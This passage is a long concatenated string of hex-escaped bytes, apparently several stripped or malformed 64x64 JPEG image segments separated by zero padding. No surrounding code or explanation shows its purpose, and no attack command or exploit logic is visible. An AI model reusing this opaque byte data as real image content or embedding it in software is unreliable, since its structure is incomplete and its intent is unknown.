+"\x31\xfa\x25\x4b\x6d\xe1\x7b\x5f\x38\x5c\xea\xb3\x4b\xa9\x5c\xff" +"\x00\x7a\x73\xf2\x8f\xa2\xf4\xc5\x37\x04\xb5\x9b\x05\x36\xf4\x82" +"\x23\x6f\x12\x4d\x7e\xe6\x2f\x0f\xd8\x49\x78\x73\x83\x71\x28\x29" +"\x10\xfc\x4f\x27\xf4\xa4\x5f\x0f\x5d\xea\x27\xcc\xf1\x06\xa0\xf3" 
+"\x8e\xbf\x66\x80\x94\x88\x7f\x53\x5d\x0a\x2a\xa2\x05\x45\x0a\xa0" +"\x60\x00\x30\x05\x3a\x97\xb4\xb7\xc0\xad\xf9\x87\xb2\xe6\xf8\xdd" +"\xff\x00\x22\x0b\x4b\x3b\x6b\x28\x44\x56\x90\x47\x0a\x0e\xc8\xb8" +"\xa9\xe8\xa2\xb2\x6e\xfb\x9a\xa5\x6d\x10\x56\x7e\xb1\xab\xdb\x69" +"\x16\xc2\x49\xc9\x79\x1c\xe2\x28\x53\x96\x91\xbd\x00\xa8\x75\x9d" +"\x72\x3d\x3d\xd2\xd6\xda\x33\x75\xa8\x4d\xc4\x56\xe9\xd7\xea\xde" +"\x82\xa2\xd1\xf4\x47\x8a\xe0\xea\x5a\xb4\x82\xeb\x51\x7f\xe2\xfe" +"\x18\x87\xf7\x54\x7f\x5f\xf2\x75\x8c\x12\x5c\xd3\xdb\xf3\x33\x94" +"\xdb\x7c\xb0\xdf\xf2\x36\xe8\xa2\x8a\xc8\xd4\x28\xa2\x8a\x00\x2b" +"\x0b\x57\xd6\xa6\xfb\x51\xd2\xf4\x58\xc5\xc6\xa0\x7e\xf3\x1f\xb9" +"\x00\xf5\x63\xeb\xed\xff\x00\xea\x30\xde\xea\xb7\x7a\xb5\xe3\xe9" +"\xba\x03\x61\x54\xe2\xe2\xfb\xaa\xc7\xec\xbe\xa7\xfc\xfb\x8d\x5d" +"\x27\x4a\xb5\xd2\x6d\x3c\x8b\x55\x39\x27\x2f\x23\x72\xce\xde\xa4" +"\xd6\xca\x2a\x1a\xcb\x7e\xdf\xe6\x62\xe4\xea\x69\x1d\xbb\xff\x00" +"\x91\x06\x8b\xa2\x45\xa6\x2b\x4d\x23\x9b\x8b\xd9\x79\x9a\xe1\xfe" +"\xf3\x1f\x41\xe8\x2b\x56\x8a\x2b\x29\x49\xc9\xdd\x9a\x46\x2a\x2a" +"\xc8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff" +"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" +"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" +"\x3f\x00\xf5\x5a\x8e\x79\x56\x08\x5a\x57\x0c\x55\x46\x4e\xd5\x2c" +"\x7f\x00\x39\x35\x9f\xab\x7d\x96\x23\xe7\x6a\x3a\x9c\x96\xf6\xe0" +"\x7f\xaa\x59\x3c\xb0\xdf\x88\xf9\x8f\xd0\x1a\xcd\x87\x5a\xba\xbb" +"\x89\x6d\xfc\x35\xa6\x31\x85\x46\xd5\xb8\xb8\xca\x46\x07\xb0\xea" +"\x6b\x48\xd3\x6d\x5c\xca\x55\x14\x5d\x99\xbb\x6f\x78\x25\xb7\x69" +"\xe5\x86\x4b\x58\xd4\xf5\x9f\x0a\x71\xeb\x8c\xf1\xf8\xd5\x2b\x7f" +"\x10\xd8\x5d\xea\x4b\x65\x64\x65\xb9\x63\x9d\xd2\xc4\x99\x8d\x38" +"\xcf\x2d\x54\xd7\xc3\x4d\x74\xde\x7f\x88\x75\x09\x6f\x4a\xfc\xde" +"\x50\x3b\x22\x5f\xc0\x7f\x3e\x2a\xbf\xda\x24\xd5\x98\xe9\x9e\x1b" 
+"\x55\xb4\xd3\xe3\x3b\x67\xbc\x8d\x76\x83\xfe\xca\x7b\xfb\xff\x00" +"\x93\xa2\x84\x1d\xff\x00\xa4\x8c\xdd\x49\xab\x5f\xfe\x0b\xff\x00" +"\x23\x6e\x2d\x62\xc6\x7b\xdb\x8b\x58\x65\xf3\x24\xb6\x4d\xf2\x15" +"\x04\xaa\xfb\x67\xd6\x9b\xfd\xb5\x65\xfd\x8a\xba\xb1\x32\x0b\x52" +"\x33\x9d\x84\x91\xce\x3a\x0f\x7a\x20\xd3\x6d\x74\xbd\x22\x5b\x6b" +"\x38\x82\x20\x8d\x89\x3d\xd8\xe3\xa9\x3d\xcd\x56\xf0\x80\x0d\xe1" +"\x4b\x25\x60\x08\x28\x41\x07\xbf\xcc\x6a\x1a\x8d\xae\xbb\xa2\xd3" +"\x9d\xf9\x5f\x66\x4b\x75\xe2\x0d\x2a\xde\x0b\x79\x65\xb8\x0d\x05" +"\xc9\x2a\xb2\x2a\x96\x4e\x3a\xe4\x8e\x95\x75\x2e\xa1\x7b\x65\x9a" +"\xd8\x89\xe2\x3d\x1a\x1c\x30\x03\x1e\xdf\xd2\xb0\xef\xbc\x3b\x2d" +"\xab\xc9\x73\xa0\x32\x46\x5f\xfd\x6d\x94\xa3\x30\xcb\xf8\x76\x3f" +"\xe7\x8a\xcb\xb0\xb7\xb1\xb9\xbb\x68\xec\xa5\x9f\xc3\xfa\xb2\xfd" +"\xe8\x33\xf2\x39\xf6\x07\x82\x2b\x4f\x67\x09\x2b\xc5\xff\x00\x5f" +"\xd7\xa9\x9b\xa9\x38\xbb\x49\x7f\x5f\xd7\xa1\xbb\x65\xe1\x8b\x18" +"\x26\xfb\x45\xe1\x93\x50\xba\xea\x65\xb9\x3b\xbf\x21\xd0\x56\xb4" +"\xd3\x43\x6b\x6e\xd2\xcc\xeb\x14\x51\x8c\x96\x3c\x00\x2a\x3d\x42" +"\xfe\xdb\x4d\xb4\x7b\x9b\xc9\x44\x71\xaf\xaf\x52\x7d\x00\xee\x6b" +"\x06\x0b\x2b\xbf\x12\xcc\x97\x9a\xb2\x35\xbe\x9c\xa7\x74\x36\x7d" +"\xe4\xf4\x67\xff\x00\x0f\xf2\x63\x59\xfb\xd3\x7a\x7f\x5b\x1a\x3b" +"\x43\xdd\x82\xd7\xfa\xdc\x69\x6b\xcf\x16\x48\x56\x3f\x32\xd3\x45" +"\x07\x97\xc6\x1e\xe7\xd8\x7a\x2f\xf9\xfa\x74\x96\xd6\xd0\xda\x5b" +"\xa4\x16\xd1\x2c\x51\x20\xc2\xaa\x8c\x01\x52\x2a\xaa\x28\x55\x01" +"\x54\x0c\x00\x06\x00\x14\xb5\x13\x9f\x36\x8b\x44\x54\x21\xcb\xab" +"\xd5\x90\xdd\xff\x00\xc7\x9c\xdf\xf5\xcd\xbf\x95\x66\x78\x3f\xfe" +"\x45\x5b\x1f\xf7\x0f\xfe\x84\x6b\x4e\xef\xfe\x3c\xe6\xff\x00\xae" +"\x6d\xfc\xab\x33\xc1\xff\x00\xf2\x2a\xd8\xff\x00\xb8\x7f\xf4\x23" +"\x4d\x7f\x0d\xfa\xaf\xd4\x4f\xf8\x8b\xd1\xfe\x86\xcd\x50\xd5\xb4" +"\x7b\x3d\x5a\x10\x97\x51\xfc\xeb\xf7\x25\x5e\x1d\x0f\xa8\x35\x7e" +"\x8a\x84\xdc\x5d\xd1\xa3\x4a\x4a\xcc\xe7\x74\xfd\x1e\xe7\x50\xbc" 
+"\x4d\x57\xc4\x18\x69\x07\x30\xda\x0e\x52\x11\xef\xea\xdf\xe7\xe9" +"\xd1\x51\x45\x54\xa6\xe4\xf5\x26\x10\x50\x5a\x05\x14\x51\x50\x59" +"\x15\xd0\xcd\xac\xa3\xd5\x0f\xf2\xac\xaf\x06\x9c\xf8\x52\xc4\xff" +"\x00\xb2\xc3\xff\x00\x1e\x35\xad\x71\xff\x00\x1e\xd2\xff\x00\xb8" +"\x7f\x95\x64\x78\x2f\xfe\x45\x3b\x1f\xf7\x5b\xff\x00\x43\x35\xaa" +"\xfe\x1b\xf5\x5f\xa9\x93\xfe\x22\xf4\x7f\xa1\xb7\x45\x14\x56\x46" +"\xa1\x45\x15\x07\xda\x31\x3b\xc6\xf1\x3a\xaa\x80\x43\x9c\x61\xbe" +"\x9d\xe8\x02\x7a\x2a\xbc\x77\x41\x9e\x45\x68\x9d\x02\x9c\x06\x6c" +"\x61\xfd\xc6\x0f\xf3\xa2\x2b\xa0\xe1\xb7\xc4\xf1\x61\x88\x1b\xb1" +"\xf3\x0f\x5e\x0f\x4a\x00\x92\xe3\xfe\x3d\xa5\xff\x00\x70\xff\x00" +"\x2a\xc8\xf0\x5f\xfc\x8a\x76\x3f\xee\xb7\xfe\x86\x6b\x43\xed\x3e" +"\x75\x9b\x96\x89\xe3\x76\x52\x36\x36\x09\xfd\x0e\x2a\x96\x83\x13" +"\xe9\x7e\x1d\xb7\xb6\x95\x19\xe6\x89\x09\x28\xb8\xc9\x24\x93\x8e" +"\xb8\xef\x5a\x26\xb9\x1a\xf3\x5f\xa9\x9b\x4f\x9d\x3f\x27\xfa\x1b" +"\x14\x55\x69\x6e\xfc\xbb\x7f\x31\x60\x92\x47\xc0\xfd\xda\xe3\x77" +"\xea\x71\xfa\xd2\xcb\x74\x11\x54\xa4\x4f\x21\x2c\x01\x0b\x8e\x07" +"\xaf\x26\xb3\x34\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" +"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" +"\x11\x03\x11\x00\x3f\x00\xf4\xab\x4d\x4a\xca\xf1\xb6\xc1\x70\x8c" +"\xfd\xe3\x6f\x95\xc7\xd5\x4f\x35\x6e\xb9\xa7\xbe\xd5\x74\xe9\x51" +"\xf5\x9d\x2d\x2f\x52\x3f\xbb\x77\x68\xbb\x99\x7d\xca\x9e\x47\xe1" +"\x8a\xb9\x0e\xa1\x06\xb0\x56\x5d\x23\x57\x08\xea\xbc\xc2\xc8\x1b" +"\x3f\x55\x38\x23\xea\x0d\x6b\x2a\x6d\x6a\xb6\x31\x8d\x54\xf4\x7b" +"\x9b\x34\xdd\xab\xb8\x36\xd1\xb8\x0c\x67\x1c\xe2\xa2\x89\xa7\x8e" +"\xd3\x7d\xd0\x57\x95\x41\x2c\x21\x07\x07\xe8\x0f\xf2\xa8\xed\xb5" +"\x3b\x3b\x99\x7c\x98\xe6\x0b\x37\xfc\xf2\x90\x14\x7f\xfb\xe4\xe0" +"\xd6\x76\x66\xbc\xc8\xb7\x45\x14\x52\x18\x51\x45\x14\x01\xcb\x8b" 
+"\xed\x53\xc3\x84\x47\xaa\x86\xbe\xd3\xc7\x0b\x76\x83\x2e\x9f\xef" +"\x8f\xeb\x57\x67\xd2\x34\x5d\x7a\x15\xbb\x85\x53\x73\x72\xb7\x36" +"\xc7\x6b\x03\xf5\x1d\xfe\xb5\xb4\x40\x65\x2a\xc0\x10\x78\x20\xf7" +"\xae\x7e\xef\x40\x9a\xce\xe1\xaf\xbc\x3b\x28\xb5\x98\xf2\xf6\xcd" +"\xfe\xaa\x5f\xc3\xb1\xff\x00\x3c\x56\xf1\x9a\x6e\xfb\x33\x9e\x50" +"\x71\x56\xb5\xd7\xe2\x37\xc8\xf1\x1e\x91\xff\x00\x1e\xd3\x26\xaf" +"\x6c\x3f\x82\x6f\x96\x50\x3f\xde\xef\xf8\xd4\xf6\x7e\x25\xd3\x6e" +"\xa7\x58\x6e\xc3\x58\xdd\xa9\xff\x00\x55\x74\xbb\x48\x3e\xc7\xa5" +"\x3f\x4a\xf1\x04\x37\x73\xfd\x8a\xf6\x26\xb1\xbf\x5e\xb0\x4b\xfc" +"\x5e\xea\x7b\x8a\xd0\xbd\xb0\xb4\xbf\x8b\xca\xbc\xb7\x8e\x65\xf4" +"\x71\x9c\x7d\x0f\x6a\x24\xf5\xb4\xd7\xdd\xfd\x58\x22\x9d\xaf\x4d" +"\xfd\xff\x00\xd5\xc6\x5d\x5a\xcd\x3b\x89\xad\x6f\xa5\x81\xb6\xe0" +"\x00\x03\x21\xf7\x2a\x7f\xa1\x15\x2a\x34\xf1\x59\xee\xb8\x02\x69" +"\x51\x49\x22\x15\xc6\xef\xa0\x27\xfa\xd6\x21\xd0\x2f\xb4\xdf\x9b" +"\x40\xd4\x9e\x34\x1f\xf2\xed\x73\xf3\xc7\xf8\x1e\xa2\x85\xf1\x2c" +"\xb6\x4e\x23\xd7\xf4\xf9\x6c\x8e\x71\xe7\xa0\xdf\x11\xfc\x47\x4f" +"\xd6\x97\x23\x97\xc2\xef\xf9\x8f\x9d\x47\xe3\x56\xfc\x8d\x6b\x5d" +"\x4e\xd6\xe6\x51\x08\x67\x8a\x7c\x67\xca\x95\x0a\x37\xe4\x7a\xfe" +"\x15\x72\xa1\xb6\xba\xb7\xbc\x88\x4d\x6b\x34\x73\x27\x66\x46\x04" +"\x54\x57\x76\x4f\x3c\xa2\x58\x6f\x2e\x2d\xa4\x03\x1f\x23\x02\xa7" +"\xea\xa7\x22\xb3\x69\x5e\xdb\x1a\xa6\xed\x7d\xcb\x74\x51\x45\x49" +"\x45\x1d\x57\x49\xb2\xd5\xa0\x11\xde\x45\x92\x39\x49\x17\x87\x43" +"\xea\x0d\x63\x8b\xcd\x53\xc3\x84\x26\xa6\x1f\x50\xd3\x87\x02\xe9" +"\x07\xef\x22\x1f\xed\x8e\xff\x00\x5f\xff\x00\x55\x74\xd4\x84\x02" +"\x08\x23\x20\xf6\xad\x23\x3b\x2b\x3d\x51\x9c\xa9\xdd\xf3\x2d\x19" +"\x15\xa5\xd5\xbd\xed\xba\xcf\x6b\x2a\xcb\x13\x74\x65\x39\xa9\x1d" +"\x55\xd0\xab\xa8\x65\x23\x04\x11\x90\x6b\x06\xef\x40\x9a\xce\xe1" +"\xaf\xbc\x3b\x30\xb5\x98\xf2\xf6\xed\xfe\xaa\x5f\xc3\xb1\xff\x00" +"\x3c\x54\xfa\x57\x88\x22\xbb\x9f\xec\x57\xb1\x35\x8d\xfa\xf5\x82" 
+"\x5f\xe2\xf7\x53\xdc\x53\x70\xd3\x9a\x1a\xa1\x2a\x96\x7c\xb3\xd1" +"\xfe\x04\x57\x3e\x16\xb4\xf3\x8d\xc6\x97\x2c\xba\x65\xcf\xf7\xe0" +"\x3f\x29\xfa\xaf\x4c\x7b\x71\x51\x7d\xbf\x5f\xd2\x72\x35\x2b\x25" +"\xd4\x60\x5f\xf9\x78\xb5\xe1\xc0\xf7\x5f\xf0\xae\x8e\x8a\x3d\xab" +"\x7a\x4b\x50\x74\x92\xd6\x3a\x05\x15\x5e\x4b\xa0\x8c\x81\x62\x79" +"\x03\x1c\x12\xb8\xc2\x0f\x53\x93\xfc\xaa\x70\x72\x33\x59\x1a\x8b" +"\x45\x14\x50\x01\x54\x75\x5d\x26\xcb\x56\x83\xcb\xbc\x8b\x24\x72" +"\x92\x2f\x0e\x87\xd4\x1a\xbd\x45\x34\xda\x77\x42\x69\x49\x59\x9c" +"\xc8\xbc\xd5\x3c\x38\x42\x6a\x61\xf5\x0d\x38\x70\x2e\x90\x7e\xf2" +"\x21\xfe\xd8\xef\xf5\xff\x00\xf5\x57\x41\x69\x75\x6f\x7b\x6e\xb3" +"\xda\xca\xb2\xc4\xdd\x19\x4e\x6a\x52\x01\x04\x11\x90\x7b\x57\x3f" +"\x77\xa0\x4d\x67\x70\xd7\xde\x1d\x98\x5a\xcc\x4e\x5e\xdd\xbf\xd5" +"\x4b\xf8\x76\x3f\xe7\x8a\xd6\xf1\x9e\xfa\x3f\xc0\xca\xd2\xa7\xb6" +"\xab\xf1\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" +"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" +"\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x2a\x00\x66\x86\xd3\x32\x7f\xa4\xca\xab" +"\xce\xc0\x17\x79\xf6\x04\xf1\xf9\xd4\x36\xba\x9c\x17\x13\x79\x05" +"\x26\x82\x7c\x13\xe5\x4d\x19\x53\xf8\x1e\x87\xf0\x34\xec\xfa\x0b" +"\x99\x75\x2e\xd1\x45\x14\x86\x14\x51\x45\x00\x14\x51\x45\x00\x67" +"\x69\x9a\xe6\x9b\xaa\x2f\xfa\x25\xca\x97\xef\x1b\x7c\xae\x3f\x03" +"\x5a\x35\x9b\xa9\x68\x3a\x6e\xa6\x77\xdc\xdb\x81\x2f\x69\xa3\xf9" +"\x5c\x7e\x23\xfa\xd6\x77\xd8\xfc\x43\xa4\x8f\xf4\x1b\xa4\xd5\x2d" +"\xd7\xfe\x58\xdc\xfc\xb2\x01\xec\xdd\xff\x00\x1a\xd7\x96\x12\xf8" +"\x5d\xbd\x7f\xcc\xc7\x9a\x71\xf8\x95\xfd\x3f\xc8\xd7\xba\xd3\xd6" +"\x79\xbc\xf8\xee\x6e\x2d\xe6\xc6\x37\x45\x27\x07\xea\xa7\x2a\x7f" +"\x2a\x94\xf9\xf0\xd9\xf4\x37\x53\x22\xf6\xc2\x6f\x3f\xc8\x56\x55" 
+"\xa7\x8a\x2c\x5e\x61\x6f\xa8\x24\x9a\x75\xcf\x78\xee\x06\xd1\xf8" +"\x37\x4f\xe5\x5b\x6a\x43\x28\x65\x20\x83\xc8\x23\xbd\x4c\x94\xa3" +"\xa4\x91\x51\x71\x96\xb1\x65\x4b\x5d\x41\x6e\x25\xf2\x5e\x0b\x8b" +"\x79\x70\x4e\xc9\x63\xc6\x40\xf4\x61\x90\x7f\x3a\xb9\x45\x53\xb8" +"\xd3\xa1\x9e\x73\x3a\xc9\x34\x13\x10\x01\x92\x29\x0a\xe7\xea\x3a" +"\x1f\xc4\x52\xd1\xb2\xb5\x4b\xb9\x72\x8a\x85\xbc\xe8\x6d\x3e\x41" +"\xf6\x99\x95\x7f\x88\x84\xde\x7f\x01\x81\x50\xda\x5f\x34\xf2\x98" +"\x66\xb4\xb8\xb6\x94\x0c\xe2\x45\xca\x9f\xa3\x0c\x83\x4a\xdd\x47" +"\x75\xb1\x72\x8a\xc6\xd2\xfc\x41\x0d\xdc\xff\x00\x62\xbd\x89\xac" +"\x6f\xd7\xac\x12\xff\x00\x17\xfb\xa7\xbd\x6c\xd3\x94\x5c\x5d\x98" +"\xa3\x25\x25\x74\x41\x77\x67\x6d\x7b\x09\x8a\xee\x08\xe6\x43\xd9" +"\xd7\x35\x88\xde\x1c\xb9\xd3\xd8\xc9\xe1\xfd\x46\x4b\x51\xd7\xec" +"\xf3\x7c\xf1\x1f\xcf\x91\xfa\xd7\x45\x45\x38\xd4\x94\x74\x42\x95" +"\x38\xcb\x56\x73\xab\xe2\x2b\xad\x3c\xec\xf1\x06\x9b\x25\xb8\xe9" +"\xf6\x88\x06\xf8\x8f\xf5\x1f\xad\x6d\xd9\xde\x5b\x5f\x42\x26\xb4" +"\x9e\x39\xa3\xf5\x43\x9a\x98\x80\xca\x55\x80\x20\xf0\x41\xef\x58" +"\x97\x9e\x17\xb1\x96\x63\x71\x62\xd2\x69\xd7\x3d\x7c\xcb\x63\xb4" +"\x1f\xaa\xf4\x35\x57\x84\xb7\xd0\x8b\x4e\x3b\x6b\xf9\x9b\x94\x57" +"\x39\xf6\xbf\x10\xe9\x23\x17\xb6\xab\xaa\x5b\x8f\xf9\x6d\x6f\xc4" +"\x80\x7b\xaf\x7f\xc2\xb4\x34\xdd\x7f\x4d\xd4\xdb\x65\xbd\xc0\x13" +"\x74\x30\xc9\xf2\xb8\x3f\x43\xd7\xf0\xa4\xe9\xc9\x2b\xad\x51\x4a" +"\xac\x5b\xb3\xd1\x80\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" +"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" +"\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x29\x29\x68\x00\xa2\x8a\x28\x00" +"\xa2\x8a\x28\x00\xa2\x8a\x28\x02\x95\xce\x97\x6b\x71\x31\x9f\x12" 
+"\x45\x39\x18\xf3\x61\x72\x8d\xfa\x75\xfc\x6a\x79\x04\xf1\x5a\x62" +"\x0c\x4d\x2a\x81\x8f\x35\xb6\xee\xfa\x90\x3f\xa5\x4d\x45\x3b\xbe" +"\xa2\xe5\x5d\x0a\x96\x97\x73\x4d\x29\x8a\xe2\xca\x6b\x67\x03\x39" +"\x38\x64\x3f\x46\x1f\xd7\x15\x68\x32\x92\x40\x20\x91\xd4\x03\xd2" +"\x96\xa9\x5d\x69\x76\x77\x53\x79\xcf\x16\xc9\xff\x00\xe7\xb4\x44" +"\xa3\xfe\x63\x9a\x7a\x36\x2d\x52\xee\x5d\xa2\xa0\x95\x67\x8e\xd7" +"\x6d\xa9\x47\x95\x40\x00\xcc\x4e\x0f\xd4\x8a\x8e\xd2\xe6\xe6\x59" +"\x1a\x3b\xab\x27\xb7\x65\x19\xdc\x1c\x3a\x37\xd0\xf5\xfc\xc0\xa5" +"\x6d\x2e\x3b\xeb\x62\xdd\x14\xc5\x96\x37\x76\x44\x91\x59\xd3\xef" +"\x28\x39\x23\xeb\x4f\xa4\x30\xff\xd9\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40" +"\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01" +"\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" +"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" +"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80" +"\x0a\x86\xe8\xdc\x88\x7f\xd0\xd2\x37\x94\x90\x07\x98\xc4\x28\x1e" +"\xbc\x0a\x9a\x8a\x01\x95\x6c\xe2\xbb\x42\xef\x79\x74\xb2\x96\xc6" +"\x11\x23\x0a\xa9\xf4\xea\x4f\xe2\x6a\x68\xe0\x86\x27\x77\x8a\x24" +"\x46\x73\x96\x65\x50\x0b\x1f\x53\xeb\x52\x51\x4d\xbb\x89\x2b\x05" +"\x14\x56\x7d\xde\xb5\xa7\xd9\xdc\x34\x13\x4c\xc6\x44\x01\xa4\x11" +"\xc4\xf2\x79\x60\xff\x00\x7b\x68\x3b\x7f\x1c\x52\x19\x66\xfa\x69" +"\xe0\xb3\x92\x5b\x5b\x56\xba\x95\x47\xcb\x0a\xb8\x52\xdc\xfa\x9e" 
+"\x05\x57\xb8\xbc\xbe\x8f\xed\x7e\x4e\x96\xf3\x79\x21\x0c\x38\x95" +"\x07\x9e\x4f\x50\x32\x7e\x5c\x7b\xf5\xab\xf4\x50\x02\x52\xd1\x45" +"\x00\x14\x51\x45\x00\x15\x83\x6c\x2f\xf4\x89\xef\x63\x4d\x36\x5b" +"\xd4\xb8\xb8\x7b\x88\xa5\x85\xd0\x72\xdf\xc2\xfb\x98\x11\x8e\x99" +"\x19\xe3\x1e\x95\xbd\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x14" +"\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x14" +"\x51\x45\x00\x14\x51\x45\x00\x00\xff\xd9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" +"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" +"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xeb\xcb\xb8\x2c\x6d\x24" +"\xba\xba\x7f\x2e\x28\xc6\x59\xb1\x9c\x56\x1f\xf6\xce\xad\xaa\xfc" +"\xba\x1e\x9e\x62\x84\xff\x00\xcb\xdd\xe7\xca\xbf\x50\xbd\x4d\x69" +"\xdd\x6b\x1a\x6c\x29\x08\x92\x7f\x37\xed\x09\xbe\x34\x8a\x36\x94" +"\xba\xff\x00\x7b\x0a\x09\xc7\xbf\x4a\x49\x75\xdd\x2e\x2b\x5b\x7b" +"\x96\xbb\x43\x15\xc9\x22\x12\x80\xb6\xf2\x3b\x00\x06\x73\xed\xd7" +"\x3c\x55\xc6\x4a\x3d\x2e\xc8\x94\x5c\xba\xd9\x14\x20\xf0\xba\x4d" +"\x28\x9f\x5b\xbc\x9b\x52\x98\x72\x15\xce\xd8\xd7\xe8\xa2\xb7\x62" +"\x8a\x38\x63\x11\xc3\x1a\xc6\x83\xa2\xa8\xc0\x1f\x85\x66\x1f\x12" +"\x69\x01\x43\x1b\xbe\x33\x86\xfd\xdb\x7e\xef\x9c\x7c\xfc\x7c\x9c" +"\xff\x00\x7b\x15\xad\x4a\x53\x94\xb7\x08\xc2\x31\xd9\x05\x14\x51" +"\x52\x58\x51\x45\x14\x01\x84\x12\xfa\xc3\x55\x92\xff\x00\xfb\x3d" +"\xae\x56\xea\xde\x34\x78\xed\xdd\x4b\x42\xc9\x9e\x06\xe2\xb9\x53" +"\xbb\xf3\x1d\x39\xaa\xd6\x3a\x45\xf2\xea\x56\x57\x97\x10\xa4\x64" +"\xdd\xcf\x75\x2c\x6a\xc0\x88\x77\xc7\xb4\x0c\xf7\x3d\xc9\x1d\xc9" +"\xae\x9a\x8a\x00\xc0\x97\x4c\xb9\x3a\x77\x88\xe3\x58\x87\x99\x7c" +"\xd2\x18\x7e\x61\xf3\xe6\x15\x51\xf4\xe4\x1e\xb5\xb9\x0a\x95\x82" +"\x35\x6f\xbc\x14\x03\xf9\x53\xe8\xa0\x02\x8a\x28\xa0\x02\x8a\x28" +"\xa0\x02\x8a\x28\xa0\x02\x8a\x28\xa0\x02\x8a\x28\xa0\x02\x8a\x28" 
+"\xa0\x02\x8a\x28\xa0\x02\x8a\x28\xa0\x02\x8a\x28\xa0\x02\x8a\x2a" +"\x1b\x8b\x84\xb7\x55\x2e\x1d\xb7\x30\x50\x11\x4b\x1c\x9f\xa7\x41" +"\xef\x40\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" +"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" +"\x11\x00\x3f\x00\xf5\x5a\x28\xa4\xe9\x40\x0b\x58\xda\xd5\x96\xa5" +"\xa9\xdc\x25\x94\x53\x2d\xb6\x9e\xcb\x99\xe5\x43\xfb\xc7\xe7\xee" +"\x0f\x4f\xaf\xff\x00\xa8\xcf\x6f\xaf\x69\x77\x37\x11\xc3\x0d\xd6" +"\x4c\xa4\xac\x4c\x51\x82\x48\x7d\x15\xc8\xda\xdf\x81\x34\x2e\xbf" +"\xa5\xbd\xb4\xf7\x02\xeb\xf7\x30\x1d\xaf\x21\x46\x0b\x9c\xe3\x68" +"\x38\xe4\xe7\x8c\x0c\x9a\xa8\xcb\x95\xdd\x13\x28\xf3\x2b\x32\xd5" +"\x8d\x95\xbe\x9f\x68\x96\xd6\x91\x08\xe2\x4e\x80\x7f\x33\xea\x6a" +"\xc5\x67\xd9\xeb\x5a\x7d\xed\xd7\xd9\x60\x9c\xfd\xa3\x69\x73\x0b" +"\xc6\xc8\xe1\x46\x06\x4a\xb0\x04\x0e\x45\x68\x54\xb7\x7d\x58\xd2" +"\xb6\x88\x28\xa2\x8a\x06\x15\x5f\x51\xb6\x37\x9a\x6d\xcd\xaa\xc9" +"\xe5\x99\xe2\x78\xc3\x8f\xe1\xc8\x23\x3f\xad\x58\xa2\x80\x39\xc6" 